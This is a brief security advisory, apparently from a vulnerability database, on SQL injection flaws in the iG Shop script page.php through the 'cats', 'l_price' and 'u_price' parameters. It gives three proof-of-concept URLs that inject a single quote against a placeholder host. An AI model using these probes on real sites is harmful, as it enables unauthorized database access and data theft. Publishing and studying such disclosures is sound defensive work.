Description
|
|
Several vulnerabilities were identified in iG Shop, which may be exploited by remote attackers to execute arbitrary commands. These flaws are due to an input validation error in the "page.php" script when handling the "cats", "l_price" and "u_price" parameters, which may be exploited by attackers to inject malicious SQL commands.
http://vulnerable/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://vulnerable/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price='&u_price=1&Submit=Search
http://vulnerable/page.php?page_type=catalog_products&type_id[]=2&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search=1&l_price=1&u_price='&Submit=Search
|